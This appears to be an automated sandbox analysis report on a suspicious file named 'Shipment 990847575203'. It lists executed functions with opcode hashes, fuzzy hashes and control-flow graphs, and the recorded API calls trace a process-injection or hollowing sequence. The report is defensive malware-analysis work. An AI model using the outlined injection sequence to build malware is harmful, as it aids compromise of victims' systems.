40514->40512 40517 7caa879 40515->40517 40516 7caa88e 40516->40507 40517->40516 40525 7ca9c40 40517->40525 40519 7caa8f9 40519->40507 40522 7caa879 40520->40522 40521 7caa88e 40521->40507 40522->40521 40523 7ca9c40 DrawTextExW 40522->40523 40524 7caa8f9 40523->40524 40524->40507 40526 7ca9c4b 40525->40526 40527 7cabea9 40526->40527 40529 7cac968 DrawTextExW 40526->40529 40530 7cac978 DrawTextExW 40526->40530 40527->40519 40528 7cabfbc 40528->40519 40529->40528 40530->40528 40531 7ed151e 40532 7ed14ac 40531->40532 40534 7ed1521 40531->40534 40547 7ed1821 40532->40547 40555 7ed1b16 40532->40555 40559 7ed1f45 40532->40559 40563 7ed1ecb 40532->40563 40568 7ed2099 40532->40568 40573 7ed218f 40532->40573 40576 7ed1c9c 40532->40576 40580 7ed1d7c 40532->40580 40584 7ed1acd 40532->40584 40588 7ed1a9d 40532->40588 40592 7ed1c03 40532->40592 40596 7ed19f0 40532->40596 40533 7ed14da 40549 7ed1863 40547->40549 40548 7ed1915 40548->40533 40549->40548 40604 7c9ea98 40549->40604 40556 7ed1b20 40555->40556 40608 7c9e190 40556->40608 40560 7ed1b31 40559->40560 40561 7ed1b46 40559->40561 40562 7c9e190 ResumeThread 40560->40562 40561->40533 40562->40561 40565 7ed1a85 40563->40565 40564 7ed236e 40565->40533 40565->40563 40565->40564 40612 7c9e900 40565->40612 40616 7c9e678 40565->40616 40569 7ed1d93 40568->40569 40570 7ed20ad 40569->40570 40620 7c9e810 40569->40620 40624 7c9e750 40573->40624 40577 7ed2158 40576->40577 40578 7ed1ca6 40576->40578 40579 7c9e678 Wow64SetThreadContext 40577->40579 40578->40533 40579->40578 40581 7ed1d82 40580->40581 40583 7c9e810 WriteProcessMemory 40581->40583 40582 7ed1db4 40583->40582 40585 7ed1ad6 40584->40585 40587 7c9e810 WriteProcessMemory 40585->40587 40586 7ed1cd0 40586->40533 40587->40586 40589 7ed1ac0 40588->40589 40591 7c9e810 WriteProcessMemory 40589->40591 40590 7ed1e1d 40590->40533 40591->40590 40593 7ed1ad6 40592->40593 40595 7c9e810 WriteProcessMemory 40593->40595 40594 7ed1cd0 40594->40533 40595->40594 40598 7ed1908 40596->40598 40597 7ed1915 40597->40533 40598->40597 40602 7c9ea98 CreateProcessA 40598->40602 40599 7ed1a32 40599->40533 40600 7ed236e 40599->40600 40601 7c9e900 ReadProcessMemory 40599->40601 40603 7c9e678 Wow64SetThreadContext 40599->40603 40601->40599 40602->40599 40603->40599 40605 7c9eb21 CreateProcessA 40604->40605 40607 7c9ece3 40605->40607 40609 7c9e1d0 ResumeThread 40608->40609 40611 7c9e201 40609->40611 40611->40533 40613 7c9e94b ReadProcessMemory 40612->40613 40615 7c9e98f 40613->40615 40615->40565 40617 7c9e6bd Wow64SetThreadContext 40616->40617 40619 7c9e705 40617->40619 40619->40565 40621 7c9e858 WriteProcessMemory 40620->40621 40623 7c9e8af 40621->40623 40625 7c9e790 VirtualAllocEx 40624->40625 40627 7c9e7cd 40625->40627 40265 7ed2648 40266 7ed27d3 40265->40266 40267 7ed266e 40265->40267 40267->40266 40270 7ed28c8 PostMessageW 40267->40270 40272 7ed28c1 PostMessageW 40267->40272 40271 7ed2934 40270->40271 40271->40267 40273 7ed2934 40272->40273 40273->40267 40274 185afb0 40278 185b098 40274->40278 40283 185b0a8 40274->40283 40275 185afbf 40279 185b0b9 40278->40279 40280 185b0dc 40278->40280 40279->40280 40281 185b2e0 GetModuleHandleW 40279->40281 40280->40275 40282 185b30d 40281->40282 40282->40275 40284 185b0dc 40283->40284 40285 185b0b9 40283->40285 40284->40275 40285->40284 40286 185b2e0 GetModuleHandleW 40285->40286 40287 185b30d 40286->40287 40287->40275 40288 185d340 40289 185d345 GetCurrentProcess 40288->40289 40291 185d3d1 40289->40291 40292 185d3d8 GetCurrentThread 40289->40292 40291->40292 40293 185d415 GetCurrentProcess 40292->40293 40294 185d40e 40292->40294 40295 185d44b 40293->40295 40294->40293 40296 185d473 GetCurrentThreadId 40295->40296 40297 185d4a4 40296->40297 40262 185d588 40263 185d58d DuplicateHandle 40262->40263 40264 185d61e 40263->40264 40325 1854668 40326 1854672 40325->40326 40328 1854758 40325->40328 40329 185477d 40328->40329 40333 1854859 40329->40333 40337 1854868 40329->40337 40334 1854868 40333->40334 40336 185496c 40334->40336 40341 1854514 40334->40341 40339 185488f 40337->40339 40338 185496c 40338->40338 40339->40338 40340 1854514 CreateActCtxA 40339->40340 40340->40338 40342 18558f8 CreateActCtxA 40341->40342 40344 18559bb 40342->40344

                                                                                                                              Executed Functions

                                                                                                                              Function 07CA11FC Relevance: .7, Instructions: 651COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3e09001e7c7f458902e8506e67f9343c219d5dd0784b23d3f80f1abd1c25846b
                                                                                                                              • Instruction ID: b331b935d9667ffe2d2513d7fb011a5d9aaa597200a745e13b27b563f7858287
                                                                                                                              • Opcode Fuzzy Hash: 3e09001e7c7f458902e8506e67f9343c219d5dd0784b23d3f80f1abd1c25846b
                                                                                                                              • Instruction Fuzzy Hash: 11428DB0E0021ADFDB54DFA9C89479EBBF2BFC8301F14816AD409AB355DB349985CB91
                                                                                                                              Function 07CA8930 Relevance: .5, Instructions: 511COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 83566703c24718da846a15545a69f97cedf86ff32dd70adf16b70a01c0166d0e
                                                                                                                              • Instruction ID: ed3fdec4ada59526ad22dd9fda520331b2782affbf6ff54cf538472c840a33f4
                                                                                                                              • Opcode Fuzzy Hash: 83566703c24718da846a15545a69f97cedf86ff32dd70adf16b70a01c0166d0e
                                                                                                                              • Instruction Fuzzy Hash: E9226D70A0021ACFCB15DF68D884A9DBBF2FF85315F118599E909AB225DB30EE85CF50
                                                                                                                              Function 07ED3110 Relevance: .4, Instructions: 395COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2440343413.0000000007ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ed0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7d9c9a7acf5a9d7330ad9be26fceab2dc8d838e3823b684601dfbd7af06be7d1
                                                                                                                              • Instruction ID: 5272c673d17a4dd4ef5926ce59ae3f78fd2130add9a5442674a0286d4a65f54b
                                                                                                                              • Opcode Fuzzy Hash: 7d9c9a7acf5a9d7330ad9be26fceab2dc8d838e3823b684601dfbd7af06be7d1
                                                                                                                              • Instruction Fuzzy Hash: 02E1ECB0702605DFDB29DB69C490BAEB7F6AF88704F14446DD505CB290DB34ED42CB52
                                                                                                                              Function 07CA2A97 Relevance: .3, Instructions: 279COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e460165eca424aa2933ae43a8922466e5ee9d3de56fb4c42a8774207f14c0306
                                                                                                                              • Instruction ID: ae6435e86f8819d0b2f62c6d116216e47f298adb63059743486fa7d0c59650fd
                                                                                                                              • Opcode Fuzzy Hash: e460165eca424aa2933ae43a8922466e5ee9d3de56fb4c42a8774207f14c0306
                                                                                                                              • Instruction Fuzzy Hash: 97C14BB1E0025AEFDF14DFA5D884799BBB2BF88305F14C1AAD809AB255DB30D985CF50
                                                                                                                              Function 07ED1821 Relevance: .3, Instructions: 261COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2440343413.0000000007ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07ED0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ed0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 06856664608320922c3077487511c753a5cc0d0d705c865eeaa6875fd44f0f0b
                                                                                                                              • Instruction ID: 0505778fe9128e2a8ff876be3ff414aaf2f59f47533ec638e7b751d359596e2a
                                                                                                                              • Opcode Fuzzy Hash: 06856664608320922c3077487511c753a5cc0d0d705c865eeaa6875fd44f0f0b
                                                                                                                              • Instruction Fuzzy Hash: 67B115B4D06219CFDB24CF66C8447EDBBB6BB8A300F1091AAD409A7251EB745E86CF50
                                                                                                                              Function 0185D330 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0185D3BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0185D3FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0185D438
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0185D491
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: c08489687d698e5f7a2f9a6a21054b76b7a1f67aed3b4304f1377d3d795b7dc2
                                                                                                                              • Instruction ID: ee1708362a8cef5482577896514d15c47422e59c05de7496b5e6d678756f021d
                                                                                                                              • Opcode Fuzzy Hash: c08489687d698e5f7a2f9a6a21054b76b7a1f67aed3b4304f1377d3d795b7dc2
                                                                                                                              • Instruction Fuzzy Hash: A95179B090174A8FDB54DFA9D4887DEBFF1EF88314F208459D908A7360D7346984CB65
                                                                                                                              Function 0185D340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0185D3BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0185D3FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0185D438
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0185D491
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 3b4f9f2c34ca03f8034308648542cd5a381a9d4d91ebf4bf9c43ffdba5e5675f
                                                                                                                              • Instruction ID: c67cab57d4c21ca7498130bef2425b5197e5c121bab41158332d03e517d51d56
                                                                                                                              • Opcode Fuzzy Hash: 3b4f9f2c34ca03f8034308648542cd5a381a9d4d91ebf4bf9c43ffdba5e5675f
                                                                                                                              • Instruction Fuzzy Hash: 585158B090074A8FDB54DFA9D548BDEBFF1EF88314F208459D908A7260D7346984CB65
                                                                                                                              Function 07C9EA98 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 47 7c9ea98-7c9eb2d 49 7c9eb2f-7c9eb39 47->49 50 7c9eb66-7c9eb86 47->50 49->50 51 7c9eb3b-7c9eb3d 49->51 57 7c9eb88-7c9eb92 50->57 58 7c9ebbf-7c9ebee 50->58 52 7c9eb3f-7c9eb49 51->52 53 7c9eb60-7c9eb63 51->53 55 7c9eb4b 52->55 56 7c9eb4d-7c9eb5c 52->56 53->50 55->56 56->56 59 7c9eb5e 56->59 57->58 60 7c9eb94-7c9eb96 57->60 64 7c9ebf0-7c9ebfa 58->64 65 7c9ec27-7c9ece1 CreateProcessA 58->65 59->53 62 7c9ebb9-7c9ebbc 60->62 63 7c9eb98-7c9eba2 60->63 62->58 66 7c9eba4 63->66 67 7c9eba6-7c9ebb5 63->67 64->65 69 7c9ebfc-7c9ebfe 64->69 78 7c9ecea-7c9ed70 65->78 79 7c9ece3-7c9ece9 65->79 66->67 67->67 68 7c9ebb7 67->68 68->62 70 7c9ec21-7c9ec24 69->70 71 7c9ec00-7c9ec0a 69->71 70->65 73 7c9ec0c 71->73 74 7c9ec0e-7c9ec1d 71->74 73->74 74->74 76 7c9ec1f 74->76 76->70 89 7c9ed80-7c9ed84 78->89 90 7c9ed72-7c9ed76 78->90 79->78 92 7c9ed94-7c9ed98 89->92 93 7c9ed86-7c9ed8a 89->93 90->89 91 7c9ed78 90->91 91->89 95 7c9eda8-7c9edac 92->95 96 7c9ed9a-7c9ed9e 92->96 93->92 94 7c9ed8c 93->94 94->92 98 7c9edbe-7c9edc5 95->98 99 7c9edae-7c9edb4 95->99 96->95 97 7c9eda0 96->97 97->95 100 7c9eddc 98->100 101 7c9edc7-7c9edd6 98->101 99->98 101->100
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C9ECCE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0
                                                                                                                              • Opcode ID: 3bb63fc121cbbe001dda7a34d8e6f44b29d5cab0c21aa4115f97592ce200c2aa
                                                                                                                              • Instruction ID: f986fb82f8f3506b7c7a57c45e437c9508905491feea4b3605a7dded2e45932d
                                                                                                                              • Opcode Fuzzy Hash: 3bb63fc121cbbe001dda7a34d8e6f44b29d5cab0c21aa4115f97592ce200c2aa
                                                                                                                              • Instruction Fuzzy Hash: 8D917EB2D0021ADFDF60DF68C885BDDBBB2BF58310F1485A9D809A7280D7749A85CF91
                                                                                                                              Function 0185B0A8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 103 185b0a8-185b0b7 104 185b0e3-185b0e7 103->104 105 185b0b9-185b0c6 call 185ad38 103->105 107 185b0e9-185b0f3 104->107 108 185b0fb-185b13c 104->108 111 185b0dc 105->111 112 185b0c8 105->112 107->108 114 185b13e-185b146 108->114 115 185b149-185b157 108->115 111->104 160 185b0ce call 185b330 112->160 161 185b0ce call 185b340 112->161 114->115 116 185b159-185b15e 115->116 117 185b17b-185b17d 115->117 120 185b160-185b167 call 185ad44 116->120 121 185b169 116->121 119 185b180-185b187 117->119 118 185b0d4-185b0d6 118->111 122 185b218-185b296 118->122 125 185b194-185b19b 119->125 126 185b189-185b191 119->126 123 185b16b-185b179 120->123 121->123 153 185b29d-185b2d8 122->153 154 185b298-185b29c 122->154 123->119 129 185b19d-185b1a5 125->129 130 185b1a8-185b1b1 call 185ad54 125->130 126->125 129->130 134 185b1b3-185b1bb 130->134 135 185b1be-185b1c3 130->135 134->135 136 185b1c5-185b1cc 135->136 137 185b1e1-185b1ee 135->137 136->137 139 185b1ce-185b1de call 185ad64 call 185ad74 136->139 144 185b211-185b217 137->144 145 185b1f0-185b20e 137->145 139->137 145->144 155 185b2e0-185b30b GetModuleHandleW 153->155 156 185b2da-185b2dd 153->156 154->153 157 185b314-185b328 155->157 158 185b30d-185b313 155->158 156->155 158->157 160->118 161->118
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0185B2FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: fa2911edc3ebe938c40ab02363faab28dabc922adc6121f091f69381b4e6af90
                                                                                                                              • Instruction ID: a4412e09c052eb83525c945793babe42153c7fb1951a648b836e6fc142d17610
                                                                                                                              • Opcode Fuzzy Hash: fa2911edc3ebe938c40ab02363faab28dabc922adc6121f091f69381b4e6af90
                                                                                                                              • Instruction Fuzzy Hash: BC716A70A00B058FE7A5DF2AD44475ABBF2FF88340F108A2DD94ADBA50D735E945CB91
                                                                                                                              Function 018558ED Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 162 18558ed-18558f6 163 18558f8-18559b9 CreateActCtxA 162->163 165 18559c2-1855a1c 163->165 166 18559bb-18559c1 163->166 173 1855a1e-1855a21 165->173 174 1855a2b-1855a2f 165->174 166->165 173->174 175 1855a31-1855a3d 174->175 176 1855a40 174->176 175->176 178 1855a41 176->178 178->178
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 018559A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: 7ec87aad204344dbf1ffefb871f687e1b3af2ff5c8d4135d4fe0e63dd70b18db
                                                                                                                              • Instruction ID: 16a0564a5a0cffb080894a240af7c1880ed44286228e78a535632531ad920742
                                                                                                                              • Opcode Fuzzy Hash: 7ec87aad204344dbf1ffefb871f687e1b3af2ff5c8d4135d4fe0e63dd70b18db
                                                                                                                              • Instruction Fuzzy Hash: 7941E070C1071DDFDB25CFAAC884B8DBBB6BF89304F2481AAD448AB251DB756945CF90
                                                                                                                              Function 01854514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 179 1854514-18559b9 CreateActCtxA 182 18559c2-1855a1c 179->182 183 18559bb-18559c1 179->183 190 1855a1e-1855a21 182->190 191 1855a2b-1855a2f 182->191 183->182 190->191 192 1855a31-1855a3d 191->192 193 1855a40 191->193 192->193 195 1855a41 193->195 195->195
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 018559A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0
                                                                                                                              • Opcode ID: dcfd70bcbbb4cf88bbe7c6a5f64ab635b6fb016b69b00db36ae3fd9332273da3
                                                                                                                              • Instruction ID: c14cb63be5367ec659358602b02b9f8d6a2d4f66455c512ff2377865025ee3f5
                                                                                                                              • Opcode Fuzzy Hash: dcfd70bcbbb4cf88bbe7c6a5f64ab635b6fb016b69b00db36ae3fd9332273da3
                                                                                                                              • Instruction Fuzzy Hash: C641DF70C1071DDBDB24DFAAC884B9EBBB5FF89304F20806AD518AB251DB756945CF90
                                                                                                                              Function 07CAB4B4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 196 7cab4b4-7cac9fc 198 7cac9fe-7caca04 196->198 199 7caca07-7caca16 196->199 198->199 200 7caca1b-7caca54 DrawTextExW 199->200 201 7caca18 199->201 202 7caca5d-7caca7a 200->202 203 7caca56-7caca5c 200->203 201->200 203->202
                                                                                                                              APIs
                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07CAC995,?,?), ref: 07CACA47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DrawText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2175133113-0
                                                                                                                              • Opcode ID: 4435012ac89fe820de87953100eb45d9932c487f65c9012170a69b89462732f0
                                                                                                                              • Instruction ID: d5182caa4582c674a594c99652b07f92b42d179ded95f1627b09ffb9dca5a91c
                                                                                                                              • Opcode Fuzzy Hash: 4435012ac89fe820de87953100eb45d9932c487f65c9012170a69b89462732f0
                                                                                                                              • Instruction Fuzzy Hash: 1C31C7B5D0024AAFDB10CF9AD884AEEFBF4FB48364F14841AE519A7210D774A954CFA4
                                                                                                                              Function 07CAC9A8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 206 7cac9a8-7cac9fc 207 7cac9fe-7caca04 206->207 208 7caca07-7caca16 206->208 207->208 209 7caca1b-7caca54 DrawTextExW 208->209 210 7caca18 208->210 211 7caca5d-7caca7a 209->211 212 7caca56-7caca5c 209->212 210->209 212->211
                                                                                                                              APIs
                                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07CAC995,?,?), ref: 07CACA47
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439663321.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ca0000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DrawText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2175133113-0
                                                                                                                              • Opcode ID: e103709c5b9d3fb0736f8776c799ff2bd2c84c2b3f3f39a5aab8e7dbe9dbdb70
                                                                                                                              • Instruction ID: b5491833ab25bc9d1cf57c0a3fc82184a4e7b135d685d9716e7e572388eec314
                                                                                                                              • Opcode Fuzzy Hash: e103709c5b9d3fb0736f8776c799ff2bd2c84c2b3f3f39a5aab8e7dbe9dbdb70
                                                                                                                              • Instruction Fuzzy Hash: E131C3B5D0020A9FDB10CF99D984AEEBBF5BF48364F14842AE559A7310D374A954CFA0
                                                                                                                              Function 07C9E810 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 215 7c9e810-7c9e85e 217 7c9e86e-7c9e8ad WriteProcessMemory 215->217 218 7c9e860-7c9e86c 215->218 220 7c9e8af-7c9e8b5 217->220 221 7c9e8b6-7c9e8e6 217->221 218->217 220->221
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C9E8A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              • Opcode ID: 8855cc1c4ab36116349219a4726cc9817eb92a0db465b7fae146cdbbeb3f6b96
                                                                                                                              • Instruction ID: 7a7cce8689bc9a743d28a1a48f02d4955a58152461c224d4c28b45c7b2f7bff1
                                                                                                                              • Opcode Fuzzy Hash: 8855cc1c4ab36116349219a4726cc9817eb92a0db465b7fae146cdbbeb3f6b96
                                                                                                                              • Instruction Fuzzy Hash: 4D2115B29003599FDB10DFAAC885BDEBBF5FF48310F148429E918A7240C7789950CBA4
                                                                                                                              Function 0185D581 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 225 185d581-185d586 226 185d58d-185d61c DuplicateHandle 225->226 227 185d588-185d58c 225->227 228 185d625-185d642 226->228 229 185d61e-185d624 226->229 227->226 229->228
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0185D60F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2420449332.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1850000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: 5fee7e7254e744f75aedc0256481574419a53fd6c0233b76d03bf668a18525aa
                                                                                                                              • Instruction ID: d78480cc4e15228c539a9beeea216c4e0afa1021f5af77c0bf58a8078799f932
                                                                                                                              • Opcode Fuzzy Hash: 5fee7e7254e744f75aedc0256481574419a53fd6c0233b76d03bf668a18525aa
                                                                                                                              • Instruction Fuzzy Hash: 6F21E4B5900209DFDB10CF9AD884ADEBBF4EB48324F14841AE918A3351D378AA54CFA5
                                                                                                                              Function 07C9E678 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 232 7c9e678-7c9e6c3 234 7c9e6d3-7c9e703 Wow64SetThreadContext 232->234 235 7c9e6c5-7c9e6d1 232->235 237 7c9e70c-7c9e73c 234->237 238 7c9e705-7c9e70b 234->238 235->234 238->237
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07C9E6F6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2439607427.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7c90000_Shipment 990847575203.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              • Opcode ID: 68bb6528dcd35efb249849d1d01006cff5bfdd853b9f2941aa9a059e6ed07470
                                                                                                                              • Instruction ID: ec1e61ab9401b75ed57c1ca07c50e406fc6d114265c19a3fcb0374082c4c3caf
                                                                                                                              • Opcode Fuzzy Hash: 68bb6528dcd35efb249849d1d01006cff5bfdd853b9f2941aa9a059e6ed07470
                                                                                                                              • Instruction Fuzzy Hash: 192129B1D003099FEB10DFAAC4857EEBBF4EF88364F148429D559A7241C7789944CFA5
                                                                                                                              Function 07C9E900 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
